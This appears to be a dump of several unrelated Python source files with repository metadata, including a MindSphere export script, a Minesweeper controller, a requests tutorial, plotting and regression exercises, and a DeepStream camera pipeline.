outputColumnsList = []
for attribute in mappingDict:
if isinstance(mappingDict[attribute], dict):
columnheaders = mappingDict[attribute]["matchingInputHeaders"]
if mappingDict[attribute].get("excludeFromExport"):
continue
else:
columnheaders = mappingDict[attribute]
if isinstance(columnheaders, tuple):
value = columnheaders[0] #In case there are multiple allowed headers for an output file, take the first one
else:
value = columnheaders
outputColumnsList.append(value)
return collections.OrderedDict([ (k, None) for k in outputColumnsList])
#######################################
#######################################
############ MAIN BLOCK ###############
#######################################
def attachDataSourcesToAgentAsset(agentAsset, mindsphereDataModelManager):
mindsphereDataModelManager.collectDataSourcesForAgent(agentAsset)
#######################################
def attachDeviceConfigToAgentAsset(agentAsset, mindsphereDataModelManager):
mindsphereDataModelManager.collectDeviceConfigForAgent(agentAsset)
#######################################
def attachDatapointMappingsToAgentAsset(agentAsset,listOfAllAssetsToBeProcessed, mindsphereDataModelManager):
omittedTargetAssets = []
mindsphereDataModelManager.collectValidDataPointMappingForAgent(agentAsset)
for dataSource in agentAsset.agentData.dataSources:
for dataPoint in dataSource.dataPoints:
for mapping in dataPoint.dataPointMappings:
if mapping.targetAsset:
targetAssetInScope = next((asset for asset in listOfAllAssetsToBeProcessed if asset.assetId == mapping.targetAsset.assetId),None)
if not targetAssetInScope:
if not next((asset for asset in omittedTargetAssets if asset.assetId == mapping.targetAsset.assetId), None):
omittedTargetAssets.append(mapping.targetAsset)
print(f"Attention! A target Device-Asset '{mapping.targetAsset.name}' for a mapping is not included in export defintion. Datapoint Mappings pointing to this asset will be omitted from export!")
                            # TODO review: exporting it anyway, with a reference to a dummy asset, probably makes no sense
else:
print(f"Attention! A target Device-Asset for a mapping is not existing in MindSphere.")
print(f"The related agent is: '{agentAsset.name}'). This is probably due to an invalid mapping ...")
            dataPoint.dataPointMappings = list(filter(lambda x: x.targetAsset not in omittedTargetAssets, dataPoint.dataPointMappings))
#######################################
def addFullAgentInformation(assetsToBeProcessed, mindsphereDataModelManager):
for asset in assetsToBeProcessed:
if asset.agentData:
try:
# First, get a potential device config
attachDeviceConfigToAgentAsset(asset, mindsphereDataModelManager)
attachDataSourcesToAgentAsset(asset, mindsphereDataModelManager)
if asset.agentData.dataSources:
# Last step: add all the existing mappings, but only if the mapped asset is part of the export
attachDatapointMappingsToAgentAsset(asset, assetsToBeProcessed, mindsphereDataModelManager)
except ScopeNotFound as e:
print(f"!!! Attention !!! Skipping collecting of agent information for the asset '{asset.name}'...")
print(f" Reason: Unkown assetType '{e}' for agent-scope detection!")
print("")
return None
#######################################
def start():
# 1. Extract all assets (and optionally asset-types and aspects) from Mindsphere
print("="*80)
print("Initialize MindSphere data model now...")
mindsphereDataModelManager = MindsphereDataModelManager(fullMode = exportMode == "full")
# 2. Find all children
# Go through list of parents to be exported and add all childs-assets to an export batch
exportBatches = {}
#In case there is only one parent asset to be exported, convert it to a list first
parentIdsToBeExportedAsList = []
if isinstance(parentIdsToBeExported, str):
parentIdsToBeExportedAsList.append(parentIdsToBeExported)
else:
parentIdsToBeExportedAsList = parentIdsToBeExported
print("")
print("... identifing data to be exported based on the source definition for the export now")
for parentID in parentIdsToBeExportedAsList:
currentParentAssets = mindsphereDataModelManager.getAssetsIncludingUserDecision(parentID, allowMultipleSelections=True)
if not currentParentAssets:
continue
for assetToBeExported in currentParentAssets:
assetsWithChilds = mindsphereDataModelManager.getListWithAllChildren(assetToBeExported, parentsFirst=True)
exportBatches[assetToBeExported.assetId] = assetsWithChilds
# 3. Merge all export batches for all given parents
# Now merge data for all given export batches (which might have been defined via various parent ids given in the configuration file)
mergedAssetListForExport = []
for currentBatch in exportBatches:
for currentAsset in exportBatches[currentBatch]:
if not next((x for x in mergedAssetListForExport if currentAsset.assetId == x.assetId), None):
mergedAssetListForExport.append(currentAsset)
# 4. Add Agent Data
# This only takes place in case datasources and mapping should also be exported (which is defined in the config):
if exportAgentAndMappingConfiguration:
# Go through the list with all agents and mark the corresponding assets as agents:
# If asset is an agent, add the agent data with device information, defined datasources and mappings
# For the ID mapping use a tracking dict, that maps internal IDs to neutral IDs (agentIDs, DatasourceIDs, Mapping IDs)
# If an agent asset has been identified, the mapping list has to be looked through to identify mapped assets:
# -> In case the mapped assets are part of the export, they also need a neutral flag.
# -> In case they are not included in the export, a warning should be provided, but the asset will not be exported
print("... collecting agent data for assets to be exported now")
addFullAgentInformation(mergedAssetListForExport, mindsphereDataModelManager)
# 5. Derive lists with columns that need to be populated during the export run and that will be existing in the output format
# Those columns should be the "opposite" of the import attributes, so that the import and export formats are compatible
# Preparation for assets
# The mapping dictionary contains the relation between object-attributes and the columns in the output-file
mappingDictAssets = SingleAssetImporterInputDataset.mappingDict
orderedOutputColumnsDictForAssetExport = convertMappingDictToOrderedColumnDict(mappingDictAssets)
# 6. Export asset information as csv
outputListAssets = []
# Initialize an empty ordered dict that will be populated during the export preparation
# The keys are the names of the output columns
for currentAsset in mergedAssetListForExport:
print("Processing asset '{}' with id '{}' now".format(currentAsset.name, currentAsset.assetId))
workingDictList = currentAsset.outputAsDictionaryList(orderedOutputColumnsDictForAssetExport, fullMode = exportMode == "full")
outputListAssets.extend(workingDictList)
# 7. Write asset information to csv. Note: the tenant-name replacement below substitutes every occurrence of the tenant name, including in descriptions and similar text fields
replaceList = [{"oldString": tenantname + ".", "newString" : "[$$$TENANTNAME$$$]."}]
helpers.writeListOfSimilarDictToCsv(outputListAssets, exportedDataOutputFile, replaceList)
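# Editor's illustration (hypothetical value, not from a real export): with
# tenantname = "acme", a cell like "acme.PumpAspect" is written out as
# "[$$$TENANTNAME$$$].PumpAspect", presumably so the export can later be
# re-imported on a different tenant.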
# 8. Prepare and export relevant agent information as csv
if exportAgentAndMappingConfiguration:
# Preparation for agents
mappingDictAgents = SingleAgentInputDataset.mappingDict
mappingDictDatapoints = SingleDatapointInputDataset.mappingDict
orderedOutputColumnDictForAgents = convertMappingDictToOrderedColumnDict(mappingDictAgents)
orderedOutputColumnDictForDatapoints = convertMappingDictToOrderedColumnDict(mappingDictDatapoints)
for currentAsset in mergedAssetListForExport:
if currentAsset.agentData:
#Create Subfolder for all Agent related data
agentDirectory = os.path.join(directory,"agentDefinitions",currentAsset.name + "_" + currentAsset.assetId)
Path(agentDirectory).mkdir(parents=True, exist_ok=True)
#Export Agent-Data with Datasource-Definitions
agentDataDictList = currentAsset.agentData.getDictListOutputForAgent(orderedOutputColumnDictForAgents)
replaceList = []
agentDefinitionFileName = os.path.join(agentDirectory,agentDefinitionsFileName)
helpers.writeListOfSimilarDictToCsv(agentDataDictList, agentDefinitionFileName, replaceList)
#Export DataPoints with DataPointMappings for each Datasource
for dataSource in currentAsset.agentData.dataSources:
agentDatapointsAndMappingsDictList = dataSource.getDictListOutputForDataPointsAndMappings(orderedOutputColumnDictForDatapoints)
dataSourceFileName = os.path.join(agentDirectory,dataSource.dataPointsFileName)
helpers.writeListOfSimilarDictToCsv(agentDatapointsAndMappingsDictList, dataSourceFileName, replaceList)
#Print out list of all neutral IDs
if logging in ("VERBOSE"):
lookUpNeutralId()
|
[
"noreply@github.com"
] |
mindsphere.noreply@github.com
|
7abe62c7ef0dcbe1c054939532683e3efd1c42ac
|
a3f683085685cb683aa38be2699ffae67089f863
|
/core/tests/sources/test_source.py
|
5968f46bdd6aee7e8ba5a0ae9923afdb8aae73a3
|
[
"BSD-3-Clause"
] |
permissive
|
saroad2/toga
|
094d763b3b129ded3a96692eed27709629dc61fc
|
3af18a5658aa75b551ed11da9b49d5b90de7855b
|
refs/heads/main
| 2023-01-28T01:25:31.300635
| 2022-11-14T01:33:22
| 2022-11-14T01:33:22
| 246,352,111
| 0
| 0
|
BSD-3-Clause
| 2023-09-10T20:15:27
| 2020-03-10T16:28:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
from unittest import TestCase
from unittest.mock import Mock
from toga.sources import Source
class SourceTests(TestCase):
def test_listeners(self):
listener1 = Mock()
source = Source()
source.add_listener(listener1)
self.assertListEqual(source.listeners, [listener1])
# activate listener
source._notify("message1")
listener1.message1.assert_called_once_with()
# activate listener with data
source._notify("message2", arg1=11, arg2=22)
listener1.message2.assert_called_once_with(arg1=11, arg2=22)
# add more widgets to listeners
listener2 = Mock()
source.add_listener(listener2)
self.assertListEqual(source.listeners, [listener1, listener2])
# activate listener
source._notify("message3")
listener1.message3.assert_called_once_with()
listener2.message3.assert_called_once_with()
# activate listener with data
source._notify("message4", arg1=11, arg2=22)
listener1.message4.assert_called_once_with(arg1=11, arg2=22)
listener2.message4.assert_called_once_with(arg1=11, arg2=22)
# remove from listeners
source.remove_listener(listener2)
self.assertListEqual(source.listeners, [listener1])
def test_missing_listener_method(self):
listener1 = object()
source = Source()
source.add_listener(listener1)
# This shouldn't raise an error
source._notify("message1")
|
[
"russell@keith-magee.com"
] |
russell@keith-magee.com
|
4a930183b499dfb6de14e5c00be6746627ad3141
|
a053f5be4356290f693704ffa5b8c4c9d45dd14c
|
/venv/bin/wheel
|
b29715d18c54d6d6c374c4d00b5e8b59fb6738fb
|
[] |
no_license
|
troupn/hellowebdjango
|
713f5631c5d4a4c23ec00e01432c05903359e7f7
|
bc986a0053f759c8b3f3166879c13797b58929d6
|
refs/heads/master
| 2021-01-22T03:23:10.527308
| 2017-02-06T21:04:05
| 2017-02-06T21:04:05
| 81,119,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
#!/home/ubuntu/workspace/projects/myhellowebapp/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ngtroup@gmail.com"
] |
ngtroup@gmail.com
|
|
dd4760af44ded3a8c110c95124a335213cb587af
|
d5c339150b74b7023177d4c039604a9018704e9d
|
/src/GameController.py
|
196deecc28f7e877c6d6c72f12c555c45b11595e
|
[] |
no_license
|
haihoangtran/MineSweeper
|
d488137d13c1079485513c5f5d8ab37d90db884c
|
451e4c1dae606a9c8c26e69926e09ef9f0cd00da
|
refs/heads/master
| 2020-08-07T06:27:37.969458
| 2014-03-11T01:23:06
| 2014-03-11T01:23:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
class GameController():
def __init__(self):
self.SIZE = 10
(self.SEALED, self.EXPOSED, self.UNEXPOSED) = range(0, 3)
self.cellStatus = [[ 0 for i in range(self.SIZE) ] for j in range(self.SIZE)]
self.cellMined = [[0 for i in range (self.SIZE)] for j in range (self.SIZE)]
for x in range (self.SIZE):
for y in range (self.SIZE):
self.cellStatus[x][y] = self.UNEXPOSED
self.cellMined[x][y] = False
def getSize(self):
return self.SIZE
def isExposed(self, x, y):
return self.cellStatus[x][y] == self.EXPOSED
def isSealed(self, x, y):
return self.cellStatus[x][y] == self.SEALED
def isUnexposed(self, x, y):
return self.cellStatus[x][y] == self.UNEXPOSED
def setMine (self, x, y):
self.cellMined[x][y] = True
def exposeCell(self,x,y):
if (self.cellStatus[x][y] == self.UNEXPOSED):
self.cellStatus[x][y] = self.EXPOSED
return True
else:
return False
def toggleSeal(self, x, y):
if self.cellStatus[x][y] != self.EXPOSED:
if self.cellStatus[x][y] == self.SEALED:
self.cellStatus[x][y] = self.UNEXPOSED
elif self.cellStatus[x][y] == self.UNEXPOSED:
self.cellStatus[x][y] = self.SEALED
return True
else:
return False
def countMines(self, x, y):
counter = 0
for adjX in range (-1, 2):
for adjY in range (-1, 2):
if (x + adjX) in range (self.SIZE) and (y + adjY) in range (self.SIZE):
if self.cellMined[x + adjX][y + adjY] == True:
counter += 1
return counter
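# A hedged usage sketch (hypothetical board, not part of the original class):
# countMines counts the mines in the 3x3 neighbourhood of (x, y), including
# the cell itself.
#   gc = GameController()
#   gc.setMine(0, 0); gc.setMine(1, 1)
#   gc.countMines(0, 1) # -> 2, both mines are neighbours of (0, 1)
#   gc.countMines(5, 5) # -> 0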
def isGameOver(self, x, y):
return self.cellStatus[x][y] == self.EXPOSED and self.cellMined[x][y] == True
def recursiveExposeEmptyCells(self, x, y):
if self.isSealed(x, y) == False:
self.exposeCell(x,y)
for adjX in range (-1, 2):
for adjY in range (-1, 2):
neighborX = x + adjX
neighborY = y + adjY
if (neighborX) in range (self.SIZE) and (neighborY) in range (self.SIZE):
if self.cellStatus[neighborX][neighborY] == self.UNEXPOSED and self.cellMined[neighborX][neighborY] == False:
if self.countMines(neighborX, neighborY) > 0:
self.exposeCell(neighborX,neighborY)
elif self.countMines(neighborX, neighborY) == 0:
self.recursiveExposeEmptyCells(neighborX, neighborY)
def winGame(self):
won = True
for x in range (self.SIZE):
for y in range (self.SIZE):
if(self.cellMined[x][y] == False and self.cellStatus[x][y] == self.UNEXPOSED) or (self.cellMined[x][y] == True and self.cellStatus[x][y] != self.SEALED):
won = False
break
return won
|
[
"hai.hg.tran@gmail.com"
] |
hai.hg.tran@gmail.com
|
bd01e38be226912fc3889a352c1d816e2857ecd7
|
2bbdd0c00080c4d27253df8722fb3e0b053bd63f
|
/Python/Machine Learning/Regression/Section 4 - Simple Linear Regression/simple_linear.py
|
e759684e3b308e25387fbeaeb9dd9e34b5d623d8
|
[
"MIT"
] |
permissive
|
urbrob/programming
|
3c005802a5d286dfe1fc8c3e31e36677a5523ad2
|
b9374fa6dca08504d6bb67c5db9fdf41a4d0d9f7
|
refs/heads/master
| 2020-04-06T07:57:50.486444
| 2020-03-05T08:17:22
| 2020-03-05T08:17:22
| 157,290,643
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
dataset = pd.read_csv('Salary_Data.csv')
x = dataset.iloc[:, :-1]
y = dataset.iloc[:, -1]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=1/3, random_state=0)
regressor = LinearRegression()
regressor.fit(x_train, y_train)
predicted_values = regressor.predict(x_test)
plt.plot(x_test, y_test, 'r+', x_test, predicted_values, 'b')
plt.show()
|
[
"urb.rob@o2.pl"
] |
urb.rob@o2.pl
|
d3d73a376e90dd88ea2bf700467fc93bb559085d
|
18d0d1e6e121928d9542def6c60d3089ac834d50
|
/.c9/metadata/environment/products/urls.py
|
90abd99bbe3407fb606f84eb0f638e28b7229f8d
|
[] |
no_license
|
JackSnowdon/stripe-test
|
31990f7f73be490d282fa0f23ab1acf373415d02
|
b2729de4eb0c908d5b1c359d29dc347f16cf388d
|
refs/heads/master
| 2023-01-04T08:09:56.693969
| 2019-06-27T11:11:45
| 2019-06-27T11:11:45
| 192,900,409
| 0
| 0
| null | 2022-11-22T02:09:57
| 2019-06-20T10:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 418
|
py
|
{"filter":false,"title":"urls.py","tooltip":"/products/urls.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":5,"column":1},"end":{"row":5,"column":1},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1561046082475,"hash":"b604cecf7240f1919bff499f7d2e250c28ef329d"}
|
[
"jacksnowdondrums@gmail.com"
] |
jacksnowdondrums@gmail.com
|
5d798c8e283b24e5f08402137f1a6bb81c96ba24
|
7546f5995ffab909ccd87da8576461bdc58951c1
|
/pachong/爬虫/Study/requeststest.py
|
fe99ef739ed62a403a2928acdb550772157814af
|
[] |
no_license
|
wskai1/Python_Study
|
fa6f818df3de31a37272dc013004cc982d61a6c1
|
72e668e94e3bc6b769dfc103ac62fa387d733306
|
refs/heads/master
| 2020-03-25T01:42:26.553100
| 2018-08-06T09:48:51
| 2018-08-06T09:48:51
| 143,252,364
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,451
|
py
|
import json
import requests
import urllib3
from requests import ConnectionError, ReadTimeout, RequestException
from requests.auth import HTTPBasicAuth
response = requests.get("https://www.baidu.com")
print("response类型:",end="")
print(type(response))
print("response状态码:",end="")
print(response.status_code)
print(type(response.text))
print("网页源代码")
print(response.text)
print(response.cookies)
print(response.content)
print(response.content.decode("utf-8"))
# Various request methods
requests.post("http://httpbin.org/post")
requests.put("http://httpbin.org/put")
requests.delete("http://httpbin.org/delete")
requests.head("http://httpbin.org/get")
requests.options("http://httpbin.org/get")
# GET request
response = requests.get("http://httpbin.org/get?name=zhaofan&age=23")
print(response.text)
import requests
data = {
"name":"zhaofan",
"age":22
}
response = requests.get("http://httpbin.org/get",params=data)
print(response.url)
print(response.text)
# Parse JSON
response = requests.get("http://httpbin.org/get")
print(type(response.text))
print(response.json())
print(json.loads(response.text))
print(type(response.json()))
# Access Zhihu directly
response =requests.get("https://www.zhihu.com")
print(response.text)
# Access Zhihu with headers
import requests
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}
response =requests.get("https://www.zhihu.com",headers=headers)
print(response.text)
# POST request
data = {
"name":"zhaofan",
"age":23
}
response = requests.post("http://httpbin.org/post",data=data)
print(response.text)
# SSL verification
urllib3.disable_warnings()
response = requests.get("https://www.12306.cn",verify=False)
print(response.status_code)
# Proxy IPs
proxies= {
"http":"http://127.0.0.1:9999",
"https":"http://127.0.0.1:8888"
}
response = requests.get("https://www.baidu.com",proxies=proxies)
print(response.text)
# Exception handling
try:
response = requests.get("http://httpbin.org/get",timout=0.1)
print(response.status_code)
except ReadTimeout:
print("timeout")
except ConnectionError:
print("connection Error")
except RequestException:
print("error")
# Authentication
response = requests.get("http://120.27.34.24:9001/",auth=HTTPBasicAuth("user","123"))
print(response.status_code)
response = requests.get("http://120.27.34.24:9001/",auth=("user","123"))
print(response.status_code)
|
[
"1729253813@qq.com"
] |
1729253813@qq.com
|
23eddcdcd6ae4cd6ef40bafc0337d44138959fd7
|
b55cfd21e25a6bf4df4eb9cffff0e005ace9badf
|
/self_assessment.py
|
4234369e3566366505a08dd3ccba54fca81d101c
|
[] |
no_license
|
margunwa123/peer_assessment_calculator
|
c2d57ca7e4c98ba064320cae342c8d7bb62b8c2c
|
40a382800772e2d307481ef09762ec6f37cb3a8e
|
refs/heads/master
| 2023-01-24T12:45:44.013360
| 2020-12-11T08:25:37
| 2020-12-11T08:25:37
| 317,132,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
# py self_assessment.py {csv file name} {list of people's NIMs}
import csv
import sys
from constant import *
def getSelfAssessment(nim):
with open(sys.argv[1]) as csv_file:
for row in csv.reader(csv_file):
if(row[NIM] == nim):
print(f"Self assessment nim {nim} adalah {row[NILAI_SENDIRI]}")
break
if __name__ == "__main__":
listNIM = sys.argv[2].split(",")
for nim in listNIM:
getSelfAssessment(nim)
|
[
"13518114@std.stei.itb.ac.id"
] |
13518114@std.stei.itb.ac.id
|
7c86499fe37f63ec047435d257414eea36444b04
|
0547d1826e99eedb959a3463520d73985a3b844e
|
/Data Analyst with Python Track/05-Introduction to Data Visualization with Matplotlib/02- Plotting time-series/04-Plotting two variables.py
|
a39c962585de865637f7454937f881c5fc655682
|
[] |
no_license
|
abhaysinh/Data-Camp
|
18031f8fd4ee199c2eff54a408c52da7bdd7ec0f
|
782c712975e14e88da4f27505adf4e5f4b457cb1
|
refs/heads/master
| 2022-11-27T10:44:11.743038
| 2020-07-25T16:15:03
| 2020-07-25T16:15:03
| 282,444,344
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,505
|
py
|
'''
Plotting two variables
If you want to plot two time-series variables that were recorded at the same times, you can add both of them to the same subplot.
If the variables have very different scales, you'll want to make sure that you plot them in different twin Axes objects. These objects can share one axis (for example, the time, or x-axis) while not sharing the other (the y-axis).
To create a twin Axes object that shares the x-axis, we use the twinx method.
In this exercise, you'll have access to a DataFrame that has the climate_change data loaded into it. This DataFrame was loaded with the "date" column set as a DateTimeIndex, and it has a column called "co2" with carbon dioxide measurements and a column called "relative_temp" with temperature measurements.
Instructions
100 XP
Use plt.subplots to create a Figure and Axes objects called fig and ax, respectively.
Plot the carbon dioxide variable in blue using the Axes plot method.
Use the Axes twinx method to create a twin Axes that shares the x-axis.
Plot the relative temperature variable in the twin Axes using its plot method.
'''
import matplotlib.pyplot as plt
# Initialize a Figure and Axes
fig, ax = plt.subplots()
# Plot the CO2 variable in blue
ax.plot(climate_change.index, climate_change["co2"], color='blue')
# Create a twin Axes that shares the x-axis
ax2 = ax.twinx()
# Plot the relative temperature in red
ax2.plot(climate_change.index, climate_change["relative_temp"], color='red')
plt.show()
|
[
"abhaysinh.surve@gmail.com"
] |
abhaysinh.surve@gmail.com
|
df39214fb6f2973cd79d9e5a1575d63504485a39
|
b4d9ad08313a975e2a4c2a70140a548812d50850
|
/apps/deepstream-test1-usbcam/deepstream_test_1_usb.py
|
564deea6064f1157d12aca66cd1bbbfb67a03dac
|
[
"MIT"
] |
permissive
|
culebracut/ds-vs
|
06a00274684df6f60f5e852d364b7fcd5b6deacd
|
d71493539d4934b86057b87bf15d80b033ddb2fe
|
refs/heads/master
| 2022-11-07T15:59:45.301898
| 2020-06-25T17:46:19
| 2020-06-25T17:46:19
| 272,830,988
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,312
|
py
|
#!/usr/bin/env python3
################################################################################
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
################################################################################
import sys
sys.path.append('../')
import gi
gi.require_version('Gst', '1.0')
from gi.repository import GObject, Gst
from common.is_aarch_64 import is_aarch64
from common.bus_call import bus_call
import pyds
#from bindings.jetson import pyds
PGIE_CLASS_ID_VEHICLE = 0
PGIE_CLASS_ID_BICYCLE = 1
PGIE_CLASS_ID_PERSON = 2
PGIE_CLASS_ID_ROADSIGN = 3
def osd_sink_pad_buffer_probe(pad,info,u_data):
frame_number=0
#Initializing object counter with 0.
obj_counter = {
PGIE_CLASS_ID_VEHICLE:0,
PGIE_CLASS_ID_PERSON:0,
PGIE_CLASS_ID_BICYCLE:0,
PGIE_CLASS_ID_ROADSIGN:0
}
num_rects=0
gst_buffer = info.get_buffer()
if not gst_buffer:
print("Unable to get GstBuffer ")
return
# Retrieve batch metadata from the gst_buffer
# Note that pyds.gst_buffer_get_nvds_batch_meta() expects the
# C address of gst_buffer as input, which is obtained with hash(gst_buffer)
batch_meta = pyds.gst_buffer_get_nvds_batch_meta(hash(gst_buffer))
l_frame = batch_meta.frame_meta_list
while l_frame is not None:
try:
# Note that l_frame.data needs a cast to pyds.NvDsFrameMeta
# The casting is done by pyds.NvDsFrameMeta.cast()
# The casting also keeps ownership of the underlying memory
# in the C code, so the Python garbage collector will leave
# it alone.
frame_meta = pyds.NvDsFrameMeta.cast(l_frame.data)
except StopIteration:
break
frame_number=frame_meta.frame_num
num_rects = frame_meta.num_obj_meta
l_obj=frame_meta.obj_meta_list
while l_obj is not None:
try:
# Casting l_obj.data to pyds.NvDsObjectMeta
obj_meta=pyds.NvDsObjectMeta.cast(l_obj.data)
except StopIteration:
break
obj_counter[obj_meta.class_id] += 1
try:
l_obj=l_obj.next
except StopIteration:
break
# Acquiring a display meta object. The memory ownership remains in
# the C code so downstream plugins can still access it. Otherwise
# the garbage collector will claim it when this probe function exits.
display_meta=pyds.nvds_acquire_display_meta_from_pool(batch_meta)
display_meta.num_labels = 1
py_nvosd_text_params = display_meta.text_params[0]
# Setting display text to be shown on screen
# Note that the pyds module allocates a buffer for the string, and the
# memory will not be claimed by the garbage collector.
# Reading the display_text field here will return the C address of the
# allocated string. Use pyds.get_string() to get the string content.
py_nvosd_text_params.display_text = "Frame Number={} Number of Objects={} Vehicle_count={} Person_count={}".format(frame_number, num_rects, obj_counter[PGIE_CLASS_ID_VEHICLE], obj_counter[PGIE_CLASS_ID_PERSON])
# Now set the offsets where the string should appear
py_nvosd_text_params.x_offset = 10
py_nvosd_text_params.y_offset = 12
# Font , font-color and font-size
py_nvosd_text_params.font_params.font_name = "Serif"
py_nvosd_text_params.font_params.font_size = 10
# set(red, green, blue, alpha); set to White
py_nvosd_text_params.font_params.font_color.set(1.0, 1.0, 1.0, 1.0)
# Text background color
py_nvosd_text_params.set_bg_clr = 1
# set(red, green, blue, alpha); set to Black
py_nvosd_text_params.text_bg_clr.set(0.0, 0.0, 0.0, 1.0)
# Using pyds.get_string() to get display_text as string
print(pyds.get_string(py_nvosd_text_params.display_text))
pyds.nvds_add_display_meta_to_frame(frame_meta, display_meta)
try:
l_frame=l_frame.next
except StopIteration:
break
return Gst.PadProbeReturn.OK
def main(args):
# Check input arguments
if len(args) < 2:
sys.stderr.write("usage: %s <v4l2-device-path>\n" % args[0])
sys.exit(1)
# TODO: use parsing
width = int(args[3])
height = int(args[5])
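# Editor's sketch for the TODO above (the flag names are assumptions, not part
# of the original sample): reading args[3]/args[5] implies an invocation such
# as `... /dev/video0 --width 1280 --height 720`; argparse would make this
# robust and keep the usage message honest:
#   import argparse
#   parser = argparse.ArgumentParser()
#   parser.add_argument("device", help="v4l2 device path, e.g. /dev/video0")
#   parser.add_argument("--width", type=int, default=1280)
#   parser.add_argument("--height", type=int, default=720)
#   opts = parser.parse_args(args[1:])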
# Standard GStreamer initialization
GObject.threads_init()
Gst.init(None)
# Create gstreamer elements
# Create Pipeline element that will form a connection of other elements
print("Creating Pipeline \n ")
pipeline = Gst.Pipeline()
if not pipeline:
sys.stderr.write(" Unable to create Pipeline \n")
# Source element for reading from the file
print("Creating Source \n ")
source = Gst.ElementFactory.make("v4l2src", "usb-cam-source")
if not source:
sys.stderr.write(" Unable to create Source \n")
caps_v4l2src = Gst.ElementFactory.make("capsfilter", "v4l2src_caps")
if not caps_v4l2src:
sys.stderr.write(" Unable to create v4l2src capsfilter \n")
print("Creating Video Converter \n")
# Adding videoconvert -> nvvideoconvert as not all
# raw formats are supported by nvvideoconvert;
# Say YUYV is unsupported - which is the common
# raw format for many logi usb cams
# In case we have a camera with raw format supported in
# nvvideoconvert, GStreamer plugins' capability negotiation
# shall be intelligent enough to reduce compute by
# videoconvert doing passthrough (TODO we need to confirm this)
# videoconvert to make sure a superset of raw formats are supported
vidconvsrc = Gst.ElementFactory.make("videoconvert", "convertor_src1")
if not vidconvsrc:
sys.stderr.write(" Unable to create videoconvert \n")
# nvvideoconvert to convert incoming raw buffers to NVMM Mem (NvBufSurface API)
nvvidconvsrc = Gst.ElementFactory.make("nvvideoconvert", "convertor_src2")
if not nvvidconvsrc:
sys.stderr.write(" Unable to create Nvvideoconvert \n")
caps_vidconvsrc = Gst.ElementFactory.make("capsfilter", "nvmm_caps")
if not caps_vidconvsrc:
sys.stderr.write(" Unable to create capsfilter \n")
# Create nvstreammux instance to form batches from one or more sources.
streammux = Gst.ElementFactory.make("nvstreammux", "Stream-muxer")
if not streammux:
sys.stderr.write(" Unable to create NvStreamMux \n")
# Use nvinfer to run inferencing on camera's output,
# behaviour of inferencing is set through config file
pgie = Gst.ElementFactory.make("nvinfer", "primary-inference")
if not pgie:
sys.stderr.write(" Unable to create pgie \n")
# Use convertor to convert from NV12 to RGBA as required by nvosd
nvvidconv = Gst.ElementFactory.make("nvvideoconvert", "convertor")
if not nvvidconv:
sys.stderr.write(" Unable to create nvvidconv \n")
# Create OSD to draw on the converted RGBA buffer
nvosd = Gst.ElementFactory.make("nvdsosd", "onscreendisplay")
if not nvosd:
sys.stderr.write(" Unable to create nvosd \n")
# Finally render the osd output
if is_aarch64():
transform = Gst.ElementFactory.make("nvegltransform", "nvegl-transform")
print("Creating EGLSink \n")
sink = Gst.ElementFactory.make("nveglglessink", "nvvideo-renderer")
if not sink:
sys.stderr.write(" Unable to create egl sink \n")
print("Playing cam %s " %args[1])
caps_v4l2src.set_property('caps', Gst.Caps.from_string("video/x-raw, framerate=30/1"))
caps_vidconvsrc.set_property('caps', Gst.Caps.from_string("video/x-raw(memory:NVMM)"))
source.set_property('device', args[1])
streammux.set_property('width', width)
streammux.set_property('height', height)
streammux.set_property('batch-size', 1)
streammux.set_property('batched-push-timeout', 4000000)
pgie.set_property('config-file-path', "dstest1_pgie_config.txt")
# Set sync = false to avoid late frame drops at the display-sink
sink.set_property('sync', False)
print("Adding elements to Pipeline \n")
pipeline.add(source)
pipeline.add(caps_v4l2src)
pipeline.add(vidconvsrc)
pipeline.add(nvvidconvsrc)
pipeline.add(caps_vidconvsrc)
pipeline.add(streammux)
pipeline.add(pgie)
pipeline.add(nvvidconv)
pipeline.add(nvosd)
pipeline.add(sink)
if is_aarch64():
pipeline.add(transform)
# we link the elements together
# v4l2src -> nvvideoconvert -> mux ->
